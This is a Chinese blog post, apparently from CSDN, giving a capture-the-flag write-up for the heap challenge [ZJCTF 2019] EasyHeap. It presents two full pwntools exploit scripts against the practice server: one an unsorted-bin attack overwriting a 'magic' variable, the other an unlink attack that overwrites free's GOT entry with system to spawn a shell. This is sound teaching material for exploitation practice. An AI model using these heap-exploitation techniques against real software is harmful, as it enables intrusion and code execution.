pwn入门堆题[ZJCTF 2019]EasyHeap

已于 2024-01-27 17:24:15 修改
阅读量566 收藏 5
点赞数 14
文章标签: 安全
于 2024-01-25 22:37:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73575406/article/details/135855141
版权

buuctf上一道简单的堆题wp,希望对新手有帮助(虽然我也只是刚学不久的新手啦QAQ),非常简单的利用方式,比uaf还简单(看wp前建议去wiki了解一下unsortedbin的相关知识)

 

漏洞:改一个变量值(magic),大于4869就能进入后门,unsortedbin攻击。此外,edit中对输入大小没有限制。

695936724fa64697a1beb41697ad28e2.png

 

利用方式:释放一个chunk到unsortedbin,修改其bk指针指向一个伪造的fake_chunk(magic-0x10),再申请该chunk可修改fake的数值为一个较大的值

 

原理:这里暂不赘述(wiki有详细的),只说说关键的:

1.unsortedbin中只有一个chunk时,该chunk的fd和bk指针指向main_arena+88(很大的值,反正比4869大)。

2.为什么fake_chunk是magic-0x10,要明确我们伪造的是chunk,而magic的所处位置要求是fd指针(或bk,那样就减0x18)。

 

最后脚本如下

from pwn import *
from LibcSearcher import *
p=remote("node5.buuoj.cn",27986)
#p=process("./pwn")

context(os = "linux", arch = "amd64", log_level= "debug")
#context(os = "linux", arch = "i386", log_level= "debug")

elf = ELF("./pwn")
#libc = ELF("./libc-2.23.so")

def menu(idx):
	p.recvuntil("Your choice :")
	p.sendline(str(idx))

def add(size, content):
	menu(1)
	p.sendlineafter("Size of Heap : ", str(size))
	p.sendlineafter("Content of heap:", content)	

def edit(idx, size, content):
	menu(2)
	p.sendlineafter("Index :", str(idx))
	p.sendlineafter("Size of Heap : ", str(size))
	p.sendlineafter("Content of heap : ", content)

def free(idx):
	menu(3)
	p.sendlineafter("Index :", str(idx))

magic = 0x6020C0

add(0x10,'aaa')
add(0x80,'aaa')
add(0x80, 'aaa')

free(1)
payload=b'a'*0x10+p64(0x20)+p64(0x91)+p64(0)+p64(magic-0x10)
#payload内容分别为:c0的申请部分,c1的pre_size,chunk1的size,chunk1的fd位,还有最后的fakechunk
edit(0, len(payload), payload)

add(0x80,'aaa')


menu(4869)

p.interactive()

然而,问题并没有结束,buu上的服务器中flag貌似和后门中的flag位置不一样,o(╥﹏╥)o。

48913ba571364eada4c6fbde657fd3e1.png

不知道是buu故意的还是弄错了,不过也能过,这里就是另一个知识点了,unlink漏洞,新手可以先不管,本文重点是unsortedbin攻击,这里就直接贴unlink的脚本了

from pwn import *
from LibcSearcher import *
p=remote("node5.buuoj.cn",27156)
#p=process("./pwn")

context(os = "linux", arch = "amd64", log_level= "debug")
#context(os = "linux", arch = "i386", log_level= "debug")

elf = ELF("./pwn")
#libc = ELF("./libc-2.23.so")

def menu(idx):
	p.recvuntil("Your choice :")
	p.sendline(str(idx))

def add(size, content):
	menu(1)
	p.sendlineafter("Size of Heap : ", str(size))
	p.sendlineafter("Content of heap:", content)	

def edit(idx, size, content):
	menu(2)
	p.sendlineafter("Index :", str(idx))
	p.sendlineafter("Size of Heap : ", str(size))
	p.sendlineafter("Content of heap : ", content)

def free(idx):
	menu(3)
	p.sendlineafter("Index :", str(idx))

add(0x20, 'aaa')
add(0x80, 'aaa')
add(0x10, 'sh\x00')

fd = 0x6020E0-0x18
bk = 0x6020E0-0x10
payload = p64(0)+p64(0x21)+p64(fd)+p64(bk)+p64(0x20)+p64(0x90)
edit(0, len(payload), payload)
free(1)

add(0x20, 'aaa')

payload = b'a'*0x18+p64(fd)+p64(elf.got['free'])
edit(0, len(payload), payload)

payload = p64(elf.plt['system'])
edit(1, len(payload), payload)

free(2)

p.interactive()

 

 

CLan_nad_
关注
  • 14
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
萌新详解[ZJCTF 2019]EasyHeap,带你走进pwn世界
qq_36495104的博客
05-21 1922
安全保护 IDA查看 main int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // eax char buf; // [rsp+0h] [rbp-10h] unsigned __int64 v5; // [rsp+8h] [rbp-8h] v5 = __readfsqword(0x28u); setvbuf(stdout, 0LL, 2, 0LL); se
BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2691
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,通常的利用方法 还是老样子,一个块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,块最多有十个,,还是用了一张表维护着块的指针,,这样就让人想把这个...
[ZJCTF 2019]EasyHeap
m0sway的博客
12-15 1328
[ZJCTF 2019]EasyHeap 使用checksec查看: 一道堆题,关闭了PIE,可以考虑覆盖got表来获取system getshell 拉进IDA中查看: 标准的菜单,main()函数就不贴截图了,menu()函数也没有营养,图也不贴了, 先来看看create_heap(): heaparray[i]:存放 chunk 的地址。 read_input(heaparray[i], size):向 chunk 写入 size 大小的内容。 heaparray是存放在bss段上的 edit
[BUUCTF]-PWN:[ZJCTF 2019]EasyHeap解析
最新发布
2301_79326813的博客
01-12 558
这是buu上的一道堆题,话不多说直接看保护和ida这里有一个要注意的点,那就是它是partial RELRO,Full RELRO开启说明got表不可写,而这里没有,这是我们解题的一个前提。然后看ida。这里不过多解释,主要还是创建块,释放块,edit块,但是没有打印块内容的函数。还有一个要注意的点,那就是他有system函数,并且参数似乎可以利用。虽然在我解题的过程中这个函数压根得不到flag,但我还是想从这一角度讲解一下解题思路,所以我分两个角度来讲。
[BUUCTF]PWN——[ZJCTF 2019]EasyHeap
mcmuyanga的博客
12-16 467
[ZJCTF 2019]EasyHeap 附件 步骤: 例行检查,64位程序 试运行一下看看程序大概执行的情况,经典的块的菜单 64位ida载入,首先检索字符串,发现了读出flag的函数 看一下每个选项的函数 add 这边size的大小由我们输入控制,heaparray数组在bss段上存放着我们chunk的指针 edit,简单的根据指针修改对应chunk里的值,但是这里的size也是由我们手动输入的,也就是说只要我们这边输入的size比add的时候输入的size大就会造成溢出 delete,释
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
warmup pwn入门
02-11
pwn入门
welpwn pwn 入门
02-11
pwn 入门
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
韩顺平 坦克大战游戏源码
12-26
韩顺平 java视频培训中讲解的游戏,根据视频讲解编写,功能基本齐全。
forgot pwn 入门
02-11
pwn 入门
[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap
Y_peak的博客
11-16 886
[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap 思路 我们第一个想法肯定是执行l33t这个函数,事实证明被摆了一道。没有结果, 但是我们有system函数我们可以将其放入我们可以操控的函数,比如printf、puts、gets、free等函数的got表,通过传入/bin/sh来解决。利用uaf就可以达到其目的。 exploit from pwn import * context(os='linux',arch='amd64',log_level='debug') p = remot
BUUCTF pwn——[ZJCTF 2019]EasyHeap
CNS-Enterprise BCC-1701-J
05-30 251
BUUCTF 做题练习
pwn】[ZJCTF 2019]EasyHeap --fastbin攻击,house of spirit
question55的博客
12-22 933
/ 往中读入数据。
ZJCTF_2019_EasyHeap做题记录
weixin_52111404的博客
03-17 691
本文仅用作自己参考
新人入门Pwn从哪里开始
P5093的博客
08-26 1704
带你快速了解pwn是什么,需要学习什么前置知识,如何继续帅下去。
ctfshow pwn入门
09-29
ctfshow pwn入门是一个关于ASLR(地址空间布局随机化)的题目。在该题目中,程序会读取系统中/proc/sys/kernel/randomize_va_space文件的内容,如果内容为0,则输出的flag是正确的,否则输出的flag是错误的。所以,我们需要先修改/proc/sys/kernel/randomize_va_space文件的内容为0,然后运行pwn文件,即可得到正确的flag。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值